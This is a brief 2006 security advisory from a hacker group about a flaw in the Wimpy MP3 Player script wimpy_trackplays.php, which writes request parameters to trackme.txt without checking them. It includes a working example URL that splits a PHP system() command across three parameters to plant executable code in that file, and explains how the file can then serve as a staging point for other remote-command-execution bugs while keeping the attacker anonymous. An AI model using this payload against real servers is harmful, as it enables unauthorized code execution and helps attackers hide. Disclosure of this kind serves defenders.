:: Summary
Vendor : Plaino Inc.
Vendor Site : Vendor Site :
http://www.wimpyplayer.com/
Product(s) : Wimpy MP3 PLayer
Version(s) : All
Severity : Low
Impact : trackme.txt overwrite
Release Date : 2/10/2006
Credits : ReZEN (rezen (a) xorcrew (.) net)
=======================================================================================
I. Description
Wimpy provides a simple, clean, enjoyable listening experience for your website's
visitors. Lists and plays an entire directory full of mp3 files automatically.
=======================================================================================
II. Synopsis
The file wimpy_trackplays.php does not check the variables passed to it prior to
writing the contents of those variables to
trackme.txt. That allows us to write
anything we want to trackme.txt. This is not really a problem for the server running
wimpy. The problem lies in the fact that being able to write to trackme.txt allows
the attacker a jump off point for other Remote Command Execution Bugs that read from
text files. These bugs are quite common and thus wimpy aids the attacker in staying
annonymous.
Example:
http://www.site.com/pathtowimpy/goodies/wimpy_trackplays.php?myAction=trackplays
&trackFile=<?php&trackArtist=system("uname -a;id;");&trackTitle=?>
that writes:
<?php
system("uname -a;id;");
?>
to trackme.txt. Then all the attacker has to do is point is RCE exploit to
trackme.txt
and there you have it. So yeah lame vuln but interesting. Peace out.
=======================================================================================
IV. Greets :>
All of xor, Infinity, stokhli, ajax, gml, cijfer, my beautiful girlfriend.
=======================================================================================